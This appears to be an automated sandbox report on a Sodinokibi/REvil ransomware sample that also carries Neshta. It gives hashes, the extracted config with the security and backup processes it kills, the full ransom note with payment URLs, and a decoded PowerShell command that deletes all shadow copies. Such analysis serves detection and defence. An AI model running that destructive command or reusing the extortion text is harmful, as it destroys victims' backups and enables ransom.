Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240419-en, locale:en-us, os:windows7-x64, system
  • submitted
    29-04-2024 14:26

General

  • Target

    07dfffd188158429b2d86d28414ad08c_JaffaCakes118.exe

  • Size

    204KB

  • MD5

    07dfffd188158429b2d86d28414ad08c

  • SHA1

    9cabd968c2fcb9a2c03d444c8cd7d8e003a17174

  • SHA256

    39ac4660e5ce9ba6df05d0c4c6459094854421d4604b325fa91a619e0841285c

  • SHA512

    c8590f51654dafc0f3ac9fd4aa6a33c247d58d2bf5d64bd3157dee1287da71280821054937cd556914d5ed72d351cb3d74026eff55185358460f604bb777ac94

  • SSDEEP

    3072:sr85C3oFiWjmfb+HP+rnRfUJcQmK4kIkGCdHwJK3Bc:k934jmfCHWtU+QL4kIpCNwE3G

Malware Config

Extracted

  • Family

    sodinokibi

  • Botnet

    19

  • Campaign

    99

  • Decoy

    luvbec.com

    eatyoveges.com

    innersurrection.com

    campusce.com

    anchelor.com

    medicalsupportco.com

    photonag.com

    rsidesigns.com

    o2o-academy.com

    hoteltantra.com

    gaearoyals.com

    arthakapitalforvaltning.dk

    ntinasfiloxenia.gr

    eafx.pro

    smartmind.net

    delegationhub.com

    laylavalentine.com

    michal-s.co.il

    stathmoulis.gr

    mariajosediazdemera.com

Attributes

  • net

    true

  • pid

    19

  • prc

    isqlplussvc

    firefoxconfig

    oracle

    ocssd

    powerpnt

    thebat64

    onenote

    sqlwriter

    outlook

    mysqld_nt

    excel

    sqlbrowser

    dbsnmp

    msaccess

    winword

    dbeng50

    visio

    ocautoupds

    encsvc

    tbirdconfig

    thebat

    sqlservr

    sqbcoreservice

    mysqld

    agntsvc

    xfssvccon

    mysqld_opt

    mydesktopservice

    ocomm

    msftesql

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} Extension name: {EXT} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    99

  • svc

    sql

    veeam

    backup

    memtas

    sophos

    svc$

    vss

    mepocs

Extracted

  • Path

    C:\Users\pzeizd3-readme.txt

  • Family

    sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion pzeizd3. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7FC4493865765E17 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/7FC4493865765E17 Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: e7OJYktNkK73/sSsm0Y+Lg9v9od/oX/e2/AOa+8txL56/BshUL+1w9mgZx4wmwFQ XjYMRp9Xz/EJzaE3GXM2fsVvgIfLYdA6o9gVYtm7bxBJ/xiYVLelmEjPWS2KBkbB lIlhRvQdiJmQ+Br6CtRdfHkxGgCk3syWPYHcAXcfJokS8JXHC73XjHa4PyBUmbex hY4aI51ix55uqicso5NXC3TRxPgIqNM6oJPJmrr8St0eJns/0pSYSycAePWnleyC 6a80vuRE7vKGqlnCxwJvVDhAfpv4qFpbw/0TOHO8505AFRkWvwQ2ENyBekKX181a RMFk4Bh8TlInMEIeZrpe3dyy9PdwwrrjCXYyNFLHcfUYdEa1FMIkLvCYybN5Sacm xLGPJuwUi6Z2yucITG293F6D6ymKM5Foq3ajNHCTj6AuosQvb9ZDa9/tm4NroN+8 +72wt8+NyiIxC9Xi0TP/7Obu66ewSaWgWcScZHp3g5wBXUPR9CgtBUaUWtSdGL5k 6CS8GUsVp2oZRav/HAoaXd6IwdKJk8PD6xUEldNacMDqDyb0561AsJJ4y7pxNFOD ND9Ant7ACSF7rmL4WGZjPskJqGy6gVN0DDVWCXG9O+ITSlr011FgsvzFN2TNGCD8 5U6vjdQ6wbcKlbS8YFR/v2QPwcytvSjx64PgPaIoQuhC3SEwFQQuC1OLAvxoZthj H8XllG8TZCj+O3x7fo6NYhZzJdHsNhPosrYfZ8EKEQ++YF4dQ0D6fx8m+ArfTY/R 4ugJXXJ7YVLzrOEOyT7b+KTOG+gmYrDp2LEZIxTx2g25EL4iyraxhN7uP7uyfHhv aRxYBZJwKkAh+TLY94IQUC3Zvrkhf/Jb8NwSxoPnFPJ8VWn3e/PPXdPxNCR4wrfX dyRHZ4sZAA5Kj0FObRlVdaB2nOHUjpvOK+lzbqALB/rLv6tD6oUXJW/7FXwT3BtR 8WTsvVo5KflX+bndXRGA7RktrHCBWQlrZZZDkIQORUEvMgmAFRfZla5mmBoLcI/y me5aI8YgIGLa7z6wZ9GDxNqGIFKQMTQAp77bTch3ZkeHUs/HNq8/tkIz1qMeC0Dy rhg8R0zyrm+cPVmXeztHjEUxmKlOQttvF+DHQ7FAktArowaPqVasWeH6Hbf9TuTG zJ92OQXbpMLmPbMUH6HqYWrDVPB4B/iXaujn87og5sOAqiwTDSWLE8InItihE7sX uObu2y4uLOUQ5A== Extension name: pzeizd3 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7FC4493865765E17

http://decryptor.top/7FC4493865765E17

Signatures

  • Detect Neshta payload (3 IoCs)
  • Neshta

    Malware from the Neshta family infects other executable files in order to spread itself and cause damage.

  • Sodin, Sodinokibi, REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Sodinokibi/Revil sample (1 IoC)
  • Executes dropped EXE (1 IoC)
  • Loads dropped DLL (3 IoCs)
  • Modifies system executable filetype association (2 TTPs, 1 IoC)
  • Reads user/profile data of web browsers (2 TTPs)

    Infostealers often target stored browser data, which can include saved credentials and similar secrets.

  • Enumerates connected drives (3 TTPs, 25 IoCs)

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  • Drops file in Program Files directory (64 IoCs)
  • Drops file in Windows directory (1 IoC)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class (1 IoC)
  • Modifies system certificate store (2 TTPs, 2 IoCs)
  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (4 IoCs)
  • Suspicious use of WriteProcessMemory (8 IoCs)
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\07dfffd188158429b2d86d28414ad08c_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\07dfffd188158429b2d86d28414ad08c_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • Modifies system executable filetype association
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Users\Admin\AppData\Local\Temp\3582-490\07dfffd188158429b2d86d28414ad08c_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\07dfffd188158429b2d86d28414ad08c_JaffaCakes118.exe"
      2⤵
      • Executes dropped EXE
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2240
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, i.e. deletion of all volume shadow copies, matching the "Uses Volume Shadow Copy service COM API" signature above)
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2552
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
    PID:2724
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:316

Network

MITRE ATT&CK Enterprise v15

Downloads

    • C:\MSOCache\ALLUSE~1\{90140~1\dwtrig20.exe

      Filesize

      547KB

      MD5

      cf6c595d3e5e9667667af096762fd9c4

      SHA1

      9bb44da8d7f6457099cb56e4f7d1026963dce7ce

      SHA256

      593e60cc30ae0789448547195af77f550387f6648d45847ea244dd0dd7abf03d

      SHA512

      ff4f789df9e6a6d0fbe12b3250f951fcf11e857906c65e96a30bb46266e7e1180d6103a03db2f3764e0d1346b2de7afba8259ba080057e4a268e45e8654dfa80

    • C:\Users\pzeizd3-readme.txt

      Filesize

      6KB

      MD5

      94aac319b9b20e211afd97edb457c496

      SHA1

      aabf1744818f05f17738d13e9357cff8494c594d

      SHA256

      a6cc5d8c2023a2736706571f90366448516c4e966dea18d080005b91498675a2

      SHA512

      b3e39cfa6fa97362ac697f2f21b7064b68879a1d53b0715396cf65176df3bb406e509c176cad6af82abe5807cc0df0122dbf766cc3f87093f0e008d687b15ad2

    • \PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE

      Filesize

      252KB

      MD5

      9e2b9928c89a9d0da1d3e8f4bd96afa7

      SHA1

      ec66cda99f44b62470c6930e5afda061579cde35

      SHA256

      8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

      SHA512

      2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

    • \Users\Admin\AppData\Local\Temp\3582-490\07dfffd188158429b2d86d28414ad08c_JaffaCakes118.exe

      Filesize

      164KB

      MD5

      1ded173cba5c2992874c2a6e7bf400c0

      SHA1

      c65f1761502be63177d1d4643018eebe63eac9d2

      SHA256

      e8b5044a1fd6342ff6d367595a9e8cac8231c392b587d4ed94c4631d587a7feb

      SHA512

      4192be5d712ee0a8ddf256757ec6851bd51ac5437828c100f8b770567b92e3c8cebbb38121e64455a764d858bc50e957d7ea0c9ffc90351b0b80f638f1d3842a

    • memory/1936-637-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

    • memory/1936-639-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

    • memory/2552-90-0x000000001B490000-0x000000001B772000-memory.dmp

      Filesize

      2.9MB

    • memory/2552-91-0x0000000002890000-0x0000000002898000-memory.dmp

      Filesize

      32KB